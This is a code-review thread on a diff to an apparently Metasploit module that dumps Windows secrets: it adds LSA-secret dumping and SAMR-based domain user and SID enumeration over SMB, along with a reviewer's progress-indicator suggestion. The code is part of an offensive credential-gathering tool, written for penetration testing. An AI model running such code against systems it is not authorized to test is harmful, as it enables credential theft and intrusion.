modules/auxiliary/gather/windows_secrets_dump.rb

```diff
@@ -949,26 +513,404 @@ def print_secret(name, secret_item)
   def dump_lsa_secrets(reg_parser, lsa_key)
     print_status('Dumping LSA Secrets')
 
-    keys = enum_key(reg_parser, '\\Policy\\Secrets')
-    return unless keys
+    lsa_secrets = reg_parser.lsa_secrets(lsa_key)
+    lsa_secrets.each do |key, secret|
+      print_secret(key, secret)
+    end
+  end
+
+  def get_machine_name_and_domain
+    if simple.client&.default_name == ''
+      begin
+        vprint_status('Getting Server Info')
+        wkssvc = @tree.open_file(filename: 'wkssvc', write: true, read: true)
+
+        vprint_status('Binding to \\wkssvc...')
+        wkssvc.bind(endpoint: RubySMB::Dcerpc::Wkssvc)
+        vprint_status('Bound to \\wkssvc')
+
+        info = wkssvc.netr_wksta_get_info
+      rescue RubySMB::Error::RubySMBError => e
+        print_error("Error when connecting to 'wkssvc' interface ([#{e.class}] #{e}).")
+        return
+      end
+      return [info[:wki100_computername].encode('utf-8'), info[:wki100_langroup].encode('utf-8')]
+    end
+    [simple.client.default_name, simple.client.default_domain]
+  end
+
+  def connect_samr(domain_name)
+    vprint_status('Connecting to Security Account Manager (SAM) Remote Protocol')
+    @samr = @tree.open_file(filename: 'samr', write: true, read: true)
+
+    vprint_status('Binding to \\samr...')
+    @samr.bind(endpoint: RubySMB::Dcerpc::Samr)
+    vprint_good('Bound to \\samr')
+
+    @server_handle = @samr.samr_connect
+    @domain_sid = @samr.samr_lookup_domain(server_handle: @server_handle, name: domain_name)
+    @domain_handle = @samr.samr_open_domain(server_handle: @server_handle, domain_id: @domain_sid)
+
+    builtin_domain_sid = @samr.samr_lookup_domain(server_handle: @server_handle, name: 'Builtin')
+    @builtin_domain_handle = @samr.samr_open_domain(server_handle: @server_handle, domain_id: builtin_domain_sid)
+  end
+
+  def get_domain_users
+    users = @samr.samr_enumerate_users_in_domain(domain_handle: @domain_handle)
+    users.map do |rid, name|
+      sid = @samr.samr_rid_to_sid(object_handle: @domain_handle, rid: rid)
+      [sid.to_s, name.to_s]
+    end
```

Comment:
When running this with about 2500+ users, it would hang here for a little while. What do you think about using something like the following to print a little progress indicator so there's output at a more regular cadence?

```suggestion
    users = @samr.samr_enumerate_users_in_domain(domain_handle: @domain_handle)
    vprint_status("Obtained #{users.length} domain users, fetching the SID for each...")
    progress_interval = 250
    users = users.each_with_index.map do |(rid, name), index|
      if index % progress_interval == 0
        print_status("SID enumeration progress - #{index.to_s.rjust((Math.log10(users.length) + 1).floor)} / #{users.length} (#{("%.2f" % (index.to_f / users.length.to_f * 100)).rjust(5)}%)")
      end
      sid = @samr.samr_rid_to_sid(object_handle: @domain_handle, rid: rid)
      [sid.to_s, name.to_s]
    end
    print_status("SID enumeration progress - #{users.length} / #{users.length} (  100%)")
    users
```

Reply:
That's a very good idea! I'll add this. Thanks!